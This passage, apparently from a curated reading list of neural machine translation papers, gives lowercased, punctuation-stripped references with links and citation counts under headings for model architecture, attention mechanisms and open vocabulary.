2020 emnlp main 6 in proceedings of emnlp 2020 brian thompson matt post 2020 automatic machine translation evaluation in many languages via zero shot paraphrasing https www aclweb org anthology 2020 emnlp main 8 in proceedings of emnlp 2020 ricardo rei craig stewart ana c farinha alon lavie 2020 comet a neural framework for mt evaluation https www aclweb org anthology 2020 emnlp main 213 in proceedings of emnlp 2020 h2 id neural machine translation neural machine translation h2 h3 id model architecture model architecture h3 nal kalchbrenner and phil blunsom 2013 recurrent continuous translation models http aclweb org anthology d13 1176 in proceedings of emnlp 2013 citation https scholar google com scholar cites 14122455772200752032 as sdt 2005 sciodt 0 5 hl en 623 ilya sutskever oriol vinyals and quoc v le 2014 sequence to sequence learning with neural networks https papers nips cc paper 5346 sequence to sequence learning with neural networks pdf in proceedings of nips 2014 citation https scholar google com scholar cites 13133880703797056141 as sdt 2005 sciodt 0 5 hl en 5 452 dzmitry bahdanau kyunghyun cho and yoshua bengio 2015 neural machine translation by jointly learning to align and translate https arxiv org pdf 1409 0473 in proceedings of iclr 2015 citation https scholar google com scholar cites 9430221802571417838 as sdt 2005 sciodt 0 5 hl en 5 596 yonghui wu mike schuster zhifeng chen quoc v le mohammad norouzi wolfgang macherey maxim krikun yuan cao qin gao klaus macherey jeff klingner apurva shah melvin johnson xiaobing liu ukasz kaiser stephan gouws yoshikiyo kato taku kudo hideto kazawa keith stevens george kurian nishant patil wei wang cliff young jason smith jason riesa alex rudnick oriol vinyals greg corrado macduff hughes and jeffrey dean 2016 google s neural machine translation system bridging the gap between human and machine translation https arxiv org pdf 1609 08144 in proceedings of nips 2016 citation https scholar google com scholar cites 17018428530559089870 as sdt 2005 sciodt 0 5 hl en 1 046 jie zhou ying cao xuguang wang peng li and wei xu 2016 deep recurrent models with fast forward connections for neural machine translation http aclweb org anthology q16 1027 transactions of the association for computational linguistics citation https scholar google com scholar cites 2319930273054317494 as sdt 2005 sciodt 0 5 hl en 73 jiatao gu zhengdong lu hang li and victor o k li 2016 incorporating copying mechanism in sequence to sequence learning http aclweb org anthology p16 1154 in proceedings of acl 2016 citation https scholar google com scholar cites 6836221883265474919 as sdt 2005 sciodt 0 5 hl en 254 biao zhang deyi xiong jinsong su hong duan and min zhang 2016 variational neural machine translation http aclweb org anthology d16 1050 in proceedings of emnlp 2016 citation https scholar google com scholar cites 16453011540088245227 as sdt 2005 sciodt 0 5 hl en 38 nal kalchbrenner lasse espeholt karen simonyan aaron van den oord alex graves and koray kavukcuoglu 2016 neural machine translation in linear time https arxiv org pdf 1610 10099 arxiv 1610 10099 citation https scholar google com scholar cites 13142156854384740601 as sdt 5 39 sciodt 0 39 hl en 189 jonas gehring michael auli david grangier denis yarats and yann n dauphin 2017 convolutional sequence to sequence learning https arxiv org pdf 1705 03122 pdf in proceedings of icml 2017 citation https scholar google com scholar cites 9032432574575787905 as sdt 2005 sciodt 0 5 hl en 453 jonas gehring michael auli david grangier and yann dauphin 2017 a convolutional encoder model for neural machine translation http aclweb org anthology p17 1012 in proceedings of acl 2017 citation https scholar google com scholar cites 13078160224216368728 as sdt 2005 sciodt 0 5 hl en 85 mingxuan wang zhengdong lu jie zhou and qun liu 2017 deep neural machine translation with linear associative unit http aclweb org anthology p17 1013 in proceedings of acl 2017 citation https scholar google com scholar cites 13710779557836853910 as sdt 2005 sciodt 0 5 hl en 21 matthias sperber graham neubig jan niehues and alex waibel 2017 neural lattice to sequence models for uncertain inputs http aclweb org anthology d17 1145 in proceedings of emnlp 2017 citation https scholar google com scholar cites 6601112324222176825 as sdt 2005 sciodt 0 5 hl en 11 denny britz anna goldie minh thang luong and quoc le 2017 massive exploration of neural machine translation architectures http aclweb org anthology d17 1151 in proceedings of emnlp 2017 citation https scholar google com scholar cites 17797498583666145091 as sdt 2005 sciodt 0 5 hl en 114 ashish vaswani noam shazeer niki parmar jakob uszkoreit llion jones aidan n gomez lukasz kaiser and illia polosukhin 2017 attention is all you need https papers nips cc paper 7181 attention is all you need pdf in proceedings of nips 2017 citation https scholar google com scholar cites 2960712678066186980 as sdt 2005 sciodt 0 5 hl en 1 748 yingce xia fei tian lijun wu jianxin lin tao qin nenghai yu and tie yan liu 2017 deliberation networks sequence generation beyond one pass decoding https papers nips cc paper 6775 deliberation networks sequence generation beyond one pass decoding pdf in proceedings of nips 2017 citation https scholar google com scholar um 1 ie utf 8 lr cites 5359968740795634948 38 zhaopeng tu yang liu lifeng shang xiaohua liu and hang li 2017 neural machine translation with reconstruction https arxiv org pdf 1611 01874 in proceedings of aaai 2017 citation https scholar google com scholar cites 1310099558617172101 as sdt 2005 sciodt 0 5 hl en 75 lukasz kaiser aidan n gomez and francois chollet 2018 depthwise separable convolutions for neural machine translation https openreview net pdf id s1jbcueab in proceedings of iclr 2018 citation https scholar google com scholar cites 7520360878420709403 as sdt 2005 sciodt 0 5 hl en 27 yanyao shen xu tan di he tao qin and tie yan liu 2018 dense information flow for neural machine translation http aclweb org anthology n18 1117 in proceedings of naacl 2018 citation https scholar google com scholar cites 12417301759540220817 as sdt 2005 sciodt 0 5 hl en 3 wenhu chen guanlin li shuo ren shujie liu zhirui zhang mu li and ming zhou 2018 generative bridging network for neural sequence prediction http aclweb org anthology n18 1154 in proceedings of naacl 2018 citation https scholar google com scholar um 1 ie utf 8 lr cites 16479416225427738693 3 mia xu chen orhan firat ankur bapna melvin johnson wolfgang macherey george foster llion jones mike schuster noam shazeer niki parmar ashish vaswani jakob uszkoreit lukasz kaiser zhifeng chen yonghui wu and macduff hughes 2018 the best of both worlds combining recent advances in neural machine translation http aclweb org anthology p18 1008 in proceedings of acl 2018 citation https scholar google com scholar cites 1960239321427735403 as sdt 2005 sciodt 0 5 hl en 22 weiyue wang derui zhu tamer alkhouli zixuan gan and hermann ney 2018 neural hidden markov model for machine translation http aclweb org anthology p18 2060 in proceedings of acl 2018 citation https scholar google com scholar cites 13737032050194395214 as sdt 2005 sciodt 0 5 hl en 3 jingjing gong xipeng qiu shaojing wang and xuanjing huang 2018 information aggregation via dynamic routing for sequence encoding http aclweb org anthology c18 1232 in coling 2018 qiang wang fuxue li tong xiao yanyang li yinqiao li and jingbo zhu 2018 multi layer representation fusion for neural machine translation http aclweb org anthology c18 1255 in proceedings of coling 2018 yachao li junhui li and min zhang 2018 adaptive weighting for neural machine translation http aclweb org anthology c18 1257 in proceedings of coling 2018 kaitao song xu tan di he jianfeng lu tao qin and tie yan liu 2018 double path networks for sequence to sequence learning http aclweb org anthology c18 1259 in proceedings of coling 2018 zi yi dou zhaopeng tu xing wang shuming shi and tong zhang 2018 exploiting deep representations for neural machine translation http aclweb org anthology d18 1457 in proceedings of emnlp 2018 citation https scholar google com scholar cites 8760242283445305561 as sdt 2005 sciodt 0 5 hl en 1 biao zhang deyi xiong jinsong su qian lin and huiji zhang 2018 simplifying neural machine translation with addition subtraction twin gated recurrent networks http aclweb org anthology d18 1459 in proceedings of emnlp 2018 gongbo tang mathias m ller annette rios and rico sennrich 2018 why self attention a targeted evaluation of neural machine translation architectures http aclweb org anthology d18 1458 in proceedings of emnlp 2018 citation https scholar google com scholar cites 8994080673363827758 as sdt 2005 sciodt 0 5 hl en 6 ke tran arianna bisazza and christof monz 2018 the importance of being recurrent for modeling hierarchical structure http aclweb org anthology d18 1503 in proceedings of emnlp 2018 citation https scholar google com scholar cites 16387948292048936516 as sdt 2005 sciodt 0 5 hl en 6 parnia bahar christopher brix and hermann ney 2018 towards two dimensional sequence to sequence model in neural machine translation http aclweb org anthology d18 1335 in proceedings of emnlp 2018 citation https scholar google com scholar cites 4611047151878523903 as sdt 2005 sciodt 0 5 hl en 1 tianyu he xu tan yingce xia di he tao qin zhibo chen and tie yan liu 2018 layer wise coordination between encoder and decoder for neural machine translation http papers nips cc paper 8019 layer wise coordination between encoder and decoder for neural machine translation pdf in proceedings of neurips 2018 citation https scholar google com scholar cites 14258883426797488339 as sdt 2005 sciodt 0 5 hl en 2 harshil shah and david barber 2018 generative neural machine translation http papers nips cc paper 7409 generative neural machine translation pdf in proceedings of neurips 2018 hany hassan anthony aue chang chen vishal chowdhary jonathan clark christian federmann xuedong huang marcin junczys dowmunt william lewis mu li shujie liu tie yan liu renqian luo arul menezes tao qin frank seide xu tan fei tian lijun wu shuangzhi wu yingce xia dongdong zhang zhirui zhang and ming zhou 2018 achieving human parity on automatic chinese to english news translation https www microsoft com en us research uploads prod 2018 03 final achieving human pdf technical report microsoft ai research citation https scholar google com scholar cites 3670312788898741170 as sdt 2005 sciodt 0 5 hl en 41 yikang shen shawn tan alessandro sordoni and aaron courville 2019 ordered neurons integrating tree structures into recurrent neural networks https openreview net pdf id b1l6qir5f7 in proceedings of iclr 2019 felix wu angela fan alexei baevski yann dauphin and michael auli 2019 pay less attention with lightweight and dynamic convolutions https openreview net pdf id skvhlh09tx in proceedings of iclr 2019 citation https scholar google com scholar um 1 ie utf 8 lr cites 3358231780148394025 1 mostafa dehghani stephan gouws oriol vinyals jakob uszkoreit lukasz kaiser 2019 universal transformers https openreview net pdf id hyzdrir9y7 in proceedings of iclr 2019 citation https scholar google com scholar cites 8443376534582904234 as sdt 2005 sciodt 0 5 hl en 12 zi yi dou zhaopeng tu xing wang longyue wang shuming shi and tong zhang 2019 dynamic layer aggregation for neural machine translation with routing by agreement https arxiv org pdf 1902 05770 pdf in proceedings of aaai 2019 zihang dai zhilin yang yiming yang jaime carbonell quoc v le and ruslan salakhutdinov 2019 transformer xl attentive language models beyond a fixed length context https arxiv org pdf 1901 02860 in proceedings of acl 2019 citation https scholar google com scholar um 1 ie utf 8 lr cites 7150055013029036741 8 qipeng guo xipeng qiu pengfei liu yunfan shao xiangyang xue and zheng zhang 2019 star transformer https arxiv org pdf 1902 09113 pdf in proceedings of naacl 2019 sho takase and naoaki okazaki 2019 positional encoding to control output sequence length https arxiv org pdf 1904 07418 pdf in proceedings of naacl 2019 jian li baosong yang zi yi dou xing wang michael r lyu and zhaopeng tu 2019 information aggregation for multi head attention with routing by agreement https arxiv org pdf 1904 03100 pdf in proceedings of naacl 2019 baosong yang longyue wang derek wong lidia s chao and zhaopeng tu 2019 convolutional self attention networks https arxiv org pdf 1904 03107 pdf in proceedings of naacl 2019 jie hao xing wang baosong yang longyue wang jinfeng zhang and zhaopeng tu 2019 modeling recurrence for transformer https arxiv org pdf 1904 03092 pdf in proceedings of naacl 2019 nikolaos pappas and james henderson 2019 deep residual output layers for neural language generation https arxiv org pdf 1905 05513 pdf in proceedings of icml 2019 david r so chen liang and quoc v le 2019 the evolved transformer https arxiv org pdf 1901 11117 in proceedings of icml 2019 ben peters vlad niculae and andr f t martins 2019 sparse sequence to sequence models https arxiv org pdf 1905 05702 in proceedings of acl 2019 roberto dess and marco baroni 2019 cnns found to jump around more skillfully than rnns compositional generalization in seq2seq convolutional networks https arxiv org pdf 1905 08527 in proceedings of acl 2019 sainbayar sukhbaatar edouard grave piotr bojanowski and armand joulin 2019 adaptive attention span in transformers https arxiv org pdf 1905 07799 in proceedings of acl 2019 yi tay aston zhang luu anh tuan jinfeng rao shuai zhang shuohang wang jie fu and siu cheung hui 2019 lightweight and efficient neural natural language processing with quaternion networks https arxiv org pdf 1906 04393 in proceedings of acl 2019 qiang wang bei li tong xiao jingbo zhu changliang li derek f wong and lidia s chao 2019 learning deep transformer models for machine translation https arxiv org pdf 1906 01787 in proceedings of acl 2019 fengshun xiao jiangtong li hai zhao rui wang and kehai chen 2019 lattice based transformer encoder for neural machine translation https arxiv org pdf 1906 01282 in proceedings of acl 2019 matthias sperber graham neubig ngoc quan pham and alex waibel 2019 self attentional models for lattice inputs https arxiv org pdf 1906 01617 in proceedings of acl 2019 xing wang zhaopeng tu longyue wang and shuming shi 2019 exploiting sentential context for neural machine translation https arxiv org pdf 1906 01268 in proceedings of acl 2019 kris korrel dieuwke hupkes verna dankers and elia bruni 2019 transcoding compositionally using attention to find more generalizable solutions https arxiv org pdf 1906 01234 in proceedings of acl 2019 lijun wu yiren wang yingce xia fei tian fei gao tao qin jianhuang lai and tie yan liu 2019 depth growing for neural machine translation https arxiv org pdf 1907 01968 in proceedings of acl 2019 shaojie bai j zico kolter and vladlen koltun 2019 deep equilibrium models https arxiv org pdf 1909 01377 pdf in proceedings of neurips 2019 gon alo m correia vlad niculae and andr f t martins 2019 adaptively sparse transformers https arxiv org pdf 1909 00015 in proceedings of emnlp 2019 yau shian wang hung yi lee and yun nung chen 2019 tree transformer integrating tree structures into self attention https arxiv org pdf 1909 06639 in proceedings of emnlp 2019 mingxuan wang jun xie zhixing tan jinsong su deyi xiong and lei li 2019 towards linear time neural machine translation with capsule networks https www aclweb org anthology d19 1074 pdf in proceedings of emnlp 2019 biao zhang ivan titov and rico sennrich 2019 improving deep transformer with depth scaled initialization and merged attention https www aclweb org anthology d19 1083 pdf in proceedings of emnlp 2019 jiatao gu changhan wang junbo zhao 2019 levenshtein transformer https papers nips cc paper 9297 levenshtein transformer in proceedings of neurips 2019 xin sheng linli xu junliang guo jingchang liu ruoyu zhao and yinlong xu 2020 introvnmt an introspective model for variational neural machine translation https www aaai org ojs index php aaai article view 6411 6267 in proceedings of aaai 2020 jian li xing wang baosong yang shuming shi michael r lyu and zhaopeng tu 2020 neuron interaction based representation composition for neural machine translation https arxiv org abs 1911 09877 in proceedings of aaai 2020 benyou wang donghao zhao christina lioma qiuchi li peng zhang jakob grue simonsen 2020 encoding word order in complex embeddings https openreview net forum id hke wtvtwr in proceedings of iclr 2020 nikita kitaev lukasz kaiser anselm levskaya 2020 reformer the efficient transformer https openreview net forum id rkgnkkhtvb in proceedings of iclr 2020 maha elbayad jiatao gu edouard grave michael auli 2020 depth adaptive transformer https openreview net forum id sjg7khvkph in proceedings of iclr 2020 ofir press noah a smith and omer levy 2020 improving transformer models by reordering their sublayers https arxiv org abs 1911 03864 in proceedings of acl 2020 yekun chai shuo jin and xinwen hou 2020 highway transformer self gating enhanced self attentive networks https arxiv org abs 2004 08178 in proceedings of acl 2020 xiangpeng wei heng yu yue hu yue zhang rongxiang weng and weihua luo 2020 multiscale collaborative deep models for neural machine translation https arxiv org abs 2004 14021 in proceedings of acl 2020 hendra setiawan matthias sperber udhyakumar nallasamy and matthias paulik 2020 variational neural machine translation with normalizing flows http arxiv org abs 2005 13978 in proceedings of acl 2020 xuanqing liu hsiang fu yu inderjit dhillon and cho jui hsieh 2020 learning to encode position for transformer with continuous dynamical model https arxiv org abs 2003 09229 in proceedings of icml 2020 ruibin xiong yunchang yang di he kai zheng shuxin zheng chen xing huishuai zhang yanyan lan liwei wang and tie yan liu 2020 on layer normalization in the transformer architecture https arxiv org abs 2002 04745 in proceedings of icml 2020 thomas bachlechner bodhisattwa prasad majumder huanru henry mao garrison w cottrell and julian mcauley 2020 rezero is all you need fast convergence at large depth https arxiv org abs 2003 04887 arxiv 2003 04887 yongjing yin fandong meng jinsong su chulun zhou zhengyuan yang jie zhou and jiebo luo 2020 a novel graph based multi modal fusion encoder for neural machine translation https www aclweb org anthology 2020 acl main 273 in proceedings of acl 2020 arya d mccarthy xian li jiatao gu and ning dong 2020 addressing posterior collapse with mutual information for improved variational neural machine translation https www aclweb org anthology 2020 acl main 753 in proceedings of acl 2020 yong wang longyue wang victor li zhaopeng tu 2020 on the sparsity of neural machine translation models https www aclweb org anthology 2020 emnlp main 78 in proceedings of emnlp 2020 bei li ziyang wang hui liu yufan jiang quan du tong xiao huizhen wang jingbo zhu 2020 shallow to deep training for neural machine translation https www aclweb org anthology 2020 emnlp main 72 in proceedings of emnlp 2020 jianhao yan fandong meng jie zhou 2020 multi unit transformers for neural machine translation https www aclweb org anthology 2020 emnlp main 77 in proceedings of emnlp 2020 xiangpeng wei heng yu yue hu rongxiang weng luxi xing weihua luo 2020 uncertainty aware semantic augmentation for neural machine translation https www aclweb org anthology 2020 emnlp main 216 in proceedings of emnlp 2020 xian li asa cooper stickland yuqing tang xiang kong 2020 deep transformers with latent depth https papers nips cc paper 2020 file 1325cdae3b6f0f91a1b629307bf2d498 paper pdf in proceedings of neurips 2020 manzil zaheer guru guruganesh kumar avinava dubey joshua ainslie chris alberti santiago ontanon philip pham anirudh ravula qifan wang li yang amr ahmed 2020 big bird transformers for longer sequences https papers nips cc paper 2020 file c8512d142a2d849725f31a9a7a361ab9 paper pdf in proceedings of neurips 2020 shuhao gu jinchao zhang fandong meng yang feng wanying xie jie zhou dong yu 2020 token level adaptive training for neural machine translation https www aclweb org anthology 2020 emnlp main 76 in proceedings of emnlp 2020 yufei wang ian d wood stephen wan mark dras mark johnson 2021 mention flags mf mention flags mf constraining transformer based text generators https aclanthology org 2021 acl long 9 in proceedings of acl 2021 h3 id attention mechanism attention mechanism h3 dzmitry bahdanau kyunghyun cho and yoshua bengio 2015 neural machine translation by jointly learning to align and translate https arxiv org pdf 1409 0473 in proceedings of iclr 2015 citation https scholar google com sg scholar cites 9430221802571417838 as sdt 2005 sciodt 0 5 hl en 5 596 minh thang luong hieu pham and christopher d manning 2015 effective approaches to attention based neural machine translation https arxiv org pdf 1508 04025 in proceedings of emnlp 2015 citation https scholar google com sg scholar cites 12347446836257434866 as sdt 2005 sciodt 0 5 hl en 1 466 shi feng shujie liu nan yang mu li ming zhou and kenny q zhu 2016 improving attention modeling with implicit distortion and fertility for machine translation https www aclweb org anthology c16 1290 in proceedings of coling 2016 citation https scholar google com scholar cites 1624882767342343496 as sdt 2005 sciodt 0 5 hl en 18 haitao mi zhiguo wang and abe ittycheriah 2016 supervised attentions for neural machine translation http aclweb org anthology d16 1249 in proceedings of emnlp 2016 citation https scholar google com sg scholar cites 16345118068023322142 as sdt 2005 sciodt 0 5 hl en 43 zhouhan lin minwei feng cicero nogueira dos santos mo yu bing xiang bowen zhou and yoshua bengio 2017 a structured self attentive sentence embedding https arxiv org abs 1703 03130 in proceedings of iclr 2017 citation https scholar google com sg scholar cites 3666844900655302515 as sdt 2005 sciodt 0 5 hl en 216 tao shen tianyi zhou guodong long jing jiang shirui pan and chengqi zhang 2018 disan directional self attention network for rnn cnn free language understanding https arxiv org pdf 1709 04696 pdf in proceedings of aaai 2018 citation https scholar google com sg scholar cites 7311258646982866903 as sdt 2005 sciodt 0 5 hl en 60 tao shen tianyi zhou guodong long jing jiang and chengqi zhang 2018 bi directional block self attention for fast and memory efficient sequence modeling https arxiv org abs 1804 00857 in proceedings of iclr 2018 citation https scholar google com sg scholar cites 7203374430207428965 as sdt 2005 sciodt 0 5 hl en 13 tao shen tianyi zhou guodong long jing jiang sen wang chengqi zhang 2018 reinforced self attention network a hybrid of hard and soft attention for sequence modeling https arxiv org abs 1801 10296 in proceedings of ijcai 2018 citation https scholar google com sg scholar cites 3809241292668177959 as sdt 2005 sciodt 0 5 hl en 18 peter shaw jakob uszkorei and ashish vaswani 2018 self attention with relative position representations http aclweb org anthology n18 2074 in proceedings of naacl 2018 citation https scholar google com sg scholar cites 5563767891081728261 as sdt 2005 sciodt 0 5 hl en 24 lesly miculicich werlen nikolaos pappas dhananjay ram and andrei popescu belis 2018 self attentive residual decoder for neural machine translation http aclweb org anthology n18 1124 in proceedings of naacl 2018 citation https scholar google com scholar um 1 ie utf 8 lr cites 10357155207431596394 3 xintong li lemao liu zhaopeng tu shuming shi and max meng 2018 target foresight based attention for neural machine translation http aclweb org anthology n18 1125 in proceedings of naacl 2018 biao zhang deyi xiong and jinsong su 2018 accelerating neural transformer via an average attention network http aclweb org anthology p18 1166 in proceedings of acl 2018 citation https scholar google com scholar cites 16436039193082710776 as sdt 2005 sciodt 0 5 hl en 5 tobias domhan 2018 how much attention do you need a granular analysis of neural machine translation architectures http aclweb org anthology p18 1167 in proceedings of acl 2018 citation https scholar google com scholar cites 16338550517026915979 as sdt 2005 sciodt 0 5 hl en 3 shaohui kuang junhui li ant nio branco weihua luo and deyi xiong 2018 attention focusing for neural machine translation by bridging source and target embeddings http aclweb org anthology p18 1164 in proceedings of acl 2018 citation https scholar google com scholar cites 13357719581808108940 as sdt 2005 sciodt 0 5 hl en 1 chaitanya malaviya pedro ferreira and andr f t martins 2018 sparse and constrained attention for neural machine translation http aclweb org anthology p18 2059 in proceedings of acl 2018 citation https scholar google com scholar cites 11257363334017043172 as sdt 2005 sciodt 0 5 hl en 4 jian li zhaopeng tu baosong yang michael r lyu and tong zhang 2018 multi head attention with disagreement regularization http aclweb org anthology d18 1317 in proceedings of emnlp 2018 citation https scholar google com scholar cites 4230613606718109837 as sdt 2005 sciodt 0 5 hl en 1 wei wu houfeng wang tianyu liu and shuming ma 2018 phrase level self attention networks for universal sentence encoding http aclweb org anthology d18 1408 in proceedings of emnlp 2018 baosong yang zhaopeng tu derek f wong fandong meng lidia s chao and tong zhang 2018 modeling localness for self attention networks https arxiv org abs 1810 10182 in proceedings of emnlp 2018 citation https scholar google com scholar cites 16651306350908112709 as sdt 2005 sciodt 0 5 hl en 2 junyang lin xu sun xuancheng ren muyu li and qi su 2018 learning when to concentrate or divert attention self adaptive attention temperature for neural machine translation http aclweb org anthology d18 1331 in proceedings of emnlp 2018 shiv shankar siddhant garg and sunita sarawagi 2018 surprisingly easy hard attention for sequence to sequence learning http aclweb org anthology d18 1065 in proceedings of emnlp 2018 ankur bapna mia chen orhan firat yuan cao and yonghui wu 2018 training deeper neural machine translation models with transparent attention http aclweb org anthology d18 1338 in proceedings of emnlp 2018 hareesh bahuleyan lili mou olga vechtomova and pascal poupart 2018 variational attention for sequence to sequence models http aclweb org anthology c18 1142 in proceedings of coling 2018 citation https scholar google com scholar um 1 ie utf 8 lr cites 1653411252630135531 14 maha elbayad laurent besacier and jakob verbeek 2018 pervasive attention 2d convolutional neural networks for sequence to sequence prediction http aclweb org anthology k18 1010 in proceedings of conll 2018 citation https scholar google com scholar cites 14016975442337015010 as sdt 2005 sciodt 0 5 hl en 4 yuntian deng yoon kim justin chiu demi guo and alexander m rush 2018 latent alignment and variational attention https papers nips cc paper 8179 latent alignment and variational attention pdf in proceedings of neurips 2018 citation https scholar google com scholar client safari rls en oe utf 8 um 1 ie utf 8 lr cites 6335407498429393003 wenpeng yin and hinrich sch tze 2019 attentive convolution equipping cnns with rnn style attention mechanisms https arxiv org pdf 1710 00519 transactions of the association for computational linguistics shiv shankar and sunita sarawagi 2019 posterior attention models for sequence to sequence learning https openreview net pdf id bkltnhc9fx in proceedings of iclr 2019 baosong yang jian li derek wong lidia s chao xing wang and zhaopeng tu 2019 context aware self attention networks https arxiv org pdf 1902 05766 pdf in proceedings of aaai 2019 reza ghaeini xiaoli z fern hamed shahbazi and prasad tadepalli 2019 saliency learning teaching the model where to pay attention https arxiv org pdf 1902 08649 pdf in proceedings of naacl 2019 sameen maruf andr f t martins and gholamreza haffari 2019 selective attention for context aware neural machine translation https arxiv org pdf 1903 08788 pdf in proceedings of naacl 2019 sainbayar sukhbaatar edouard grave piotr bojanowski and armand joulin 2019 adaptive attention span in transformers https arxiv org pdf 1905 07799 in proceedings of acl 2019 kris korrel dieuwke hupkes verna dankers and elia bruni 2019 transcoding compositionally using attention to find more generalizable solutions https arxiv org pdf 1906 01234 in proceedings of acl 2019 jesse vig 2019 a multiscale visualization of attention in the transformer model https arxiv org pdf 1906 05714 in proceedings of acl 2019 sathish reddy indurthi insoo chung and sangha kim 2019 look harder a neural machine translation model with hard attention https www aclweb org anthology p19 1290 in proceedings of acl 2019 mingzhou xu derek f wong baosong yang yue zhang and lidia s chao 2019 leveraging local and global patterns for self attention networks https www aclweb org anthology p19 1295 in proceedings of acl 2019 sarthak jain and byron c wallace 2019 attention is not explanation https arxiv org pdf 1902 10186 pdf in proceedings of naacl 2019 sarah wiegreffe and yuval pinter 2019 attention is not not explanation https arxiv org pdf 1908 04626 in proceedings of emnlp 2019 xing wang zhaopeng tu longyue wang and shuming shi 2019 self attention with structural position representations https arxiv org pdf 1909 00383 in proceedings of emnlp 2019 yao hung hubert tsai shaojie bai makoto yamada louis philippe morency and ruslan salakhutdinov 2019 transformer dissection an unified understanding for transformer s attention via the lens of kernel https arxiv org pdf 1908 11775 in proceedings of emnlp 2019 kehai chen rui wang masao utiyama and eiichiro sumita 2019 recurrent position embedding for neural machine translation https www aclweb org anthology d19 1139 in proceedings of emnlp 2019 weiqiu you simeng sun and mohit iyyer 2020 hard coded gaussian attention for neural machine translation https arxiv org abs 2005 00742 in proceedings of acl 2020 emanuele bugliarello and naoaki okazaki 2020 enhancing machine translation with dependency aware self attention http arxiv org abs 1909 03149 in proceedings of acl 2020 yann dubois gautier dagan dieuwke hupkes elia bruni 2020 location attention for extrapolation to longer sequences https www aclweb org anthology 2020 acl main 39 in proceedings of acl 2020 michael hahn 2020 theoretical limitations of self attention in neural sequence models https transacl org ojs index php tacl article view 1815 transactions of the association for computational linguistics apoorv vyas angelos katharopoulos fran ois fleuret 2020 fast transformers with clustered attention https papers nips cc paper 2020 file f6a8dd1c954c8506aadc764cc32b895e paper pdf in proceedings of neurips 2020 chulhee yun yin wen chang srinadh bhojanapalli ankit singh rawat sashank reddi sanjiv kumar 2020 o n connections are expressive enough universal approximability of sparse transformers https papers nips cc paper 2020 file 9ed27554c893b5bad850a422c3538c15 paper pdf in proceedings of neurips 2020 yu lu1 jiali zeng jiajun zhang shuangzhi wu mu li 2021 attention calibration for transformer in neural machine translation https aclanthology org 2021 acl long 103 pdf in proceedings of acl 2021 h3 id open vocabulary open vocabulary h3 felix hill kyunghyun cho sebastien jean coline devin and yoshua bengio 2015 embedding word similarity with neural machine translation https arxiv org pdf 1412 6448 pdf in proceedings of iclr 2015 citation https scholar google com hk scholar cites 3941248209566557946 as sdt 2005 sciodt 0 5 hl en 24 thang luong ilya sutskever quoc le oriol vinyals and wojciech zaremba 2015 addressing the rare word problem in neural machine translation http aclweb org anthology p15 1002 in proceedings of acl 2015 citation https scholar google com hk scholar cites 1855379039969159341 as sdt 2005 sciodt 0 5 hl en 367 s bastien jean kyunghyun cho roland memisevic and yoshua bengio 2015 on using very large target vocabulary for neural machine translation http www aclweb org anthology p15 1001 in proceedings of acl 2015 citation https scholar google com hk scholar cites 13222564911222792417 as sdt 2005 sciodt 0 5 hl en 455 rico sennrich barry haddow and alexandra birch 2016 neural machine translation of rare words with subword units https arxiv org pdf 1508 07909 pdf in proceedings of acl 2016 citation https scholar google com hk scholar cites 1307964014330144942 as sdt 2005 sciodt 0 5 hl en 795 minh thang luong and christopher d manning 2016 achieving open vocabulary neural machine translation with hybrid word character models http aclweb org anthology p16 1100 in proceedings of acl 2016 citation https scholar google com hk scholar cites 7652846715026310814 as sdt 2005 sciodt 0 5 hl en 173 junyoung chung kyunghyun cho and yoshua bengio 2016 a character level decoder without explicit segmentation for neural machine translation http aclweb org anthology p16 1160 in proceedings of acl 2016 citation https scholar google com hk scholar cites 2193535701900882329 as sdt 2005 sciodt 0 5 hl en 171 jason lee kyunghyun cho and thomas hofmann 2017 fully character level neural machine translation without explicit segmentation http aclweb org anthology q17 1026 transactions of the association for computational linguistics citation https scholar google com hk scholar cites 13463489320810094413 as sdt 2005 sciodt 0 5 hl en 116 yang feng shiyue zhang andi zhang dong wang and andrew abel 2017 memory augmented neural machine translation http aclweb org anthology d17 1146 in proceedings of emnlp 2017 citation https scholar google com hk scholar cites 825727884820810695 as sdt 2005 sciodt 0 5 hl en 9 baosong yang derek f wong tong xiao lidia s chao and jingbo zhu 2017 towards bidirectional hierarchical representations for attention based neural machine translation http aclweb org anthology d17 1150 in proceedings of emnlp 2017 citation https scholar google com hk scholar cites 18313642653606285813 as sdt 2005 sciodt 0 5 hl en 5 peyman passban qun liu and andy way 2018 improving character based decoding using target side morphological information for neural machine translation http aclweb org anthology n18 1006 in proceedings of naacl 2018 citation https scholar google com hk scholar cites 13968879243228181963 as sdt 2005 sciodt 0 5 hl en 5 huadong chen shujian huang david chiang xinyu dai and jiajun chen 2018 combining character and word information in neural machine translation using a multi level attention http aclweb org anthology n18 1116 in proceedings of naacl 2018 frederick liu han lu and graham neubig 2018 handling homographs in neural machine translation http aclweb org anthology n18 1121 in proceedings of naacl 2018 citation https scholar google com hk scholar cites 8530214186708420865 as sdt 2005 sciodt 0 5 hl en 8 taku kudo 2018 subword regularization improving neural network translation models with multiple subword candidates http aclweb org anthology p18 1007 in proceedings of acl 2018 citation https scholar google com hk scholar cites 10996996628614665108 as sdt 2005 sciodt 0 5 hl en 17 makoto morishita jun suzuki and masaaki nagata 2018 improving neural machine translation by incorporating hierarchical subword features http aclweb org anthology c18 1052 in proceedings of coling 2018 yang zhao jiajun zhang zhongjun he chengqing zong and hua wu 2018 addressing troublesome words in neural machine translation http aclweb org anthology d18 1036 in proceedings of emnlp 2018 colin cherry george foster ankur bapna orhan firat and wolfgang macherey 2018 revisiting character based neural machine translation with capacity and compression http aclweb org anthology d18 1461 in proceedings of emnlp 2018 citation https scholar google com hk scholar cites 1263295983934592415 as sdt 2005 sciodt 0 5 hl en 1 rebecca knowles and philipp koehn 2018 context and copying in neural machine translation http aclweb org anthology d18 1339 in proceedings of emnlp 2018 matthias huck viktor hangya and alexander fraser 2019 better oov translation with bilingual terminology mining https www aclweb org anthology p19 1581 in proceedings of acl 2019 changhan wang kyunghyun cho jiatao gu 2020 neural machine translation with byte level subwords https arxiv org abs 1909 03341 in proceedings of aaai 2020 duygu ataman wilker aziz alexandra birch 2020 a latent morphology model for open vocabulary neural machine translation https openreview net forum id bjxsi1skdh in proceedings of iclr 2020 xuanli he gholamreza haffari and mohammad norouzi 2020 dynamic programming encoding for subword segmentation in neural machine translation https arxiv org abs 2005 06606 in proceedings of acl 2020 yingqiang gao nikola i nikolov yuhuang hu and richard h r hahnloser 2020 character level translation with self attention https arxiv org abs 2004 14788 in proceedings of acl 2020 ivan provilkov dmitrii emelianenko elena voita 2020 bpe dropout simple and effective subword regularization https arxiv org abs 1910 13267 in proceedings of acl 2020 jind ich libovick 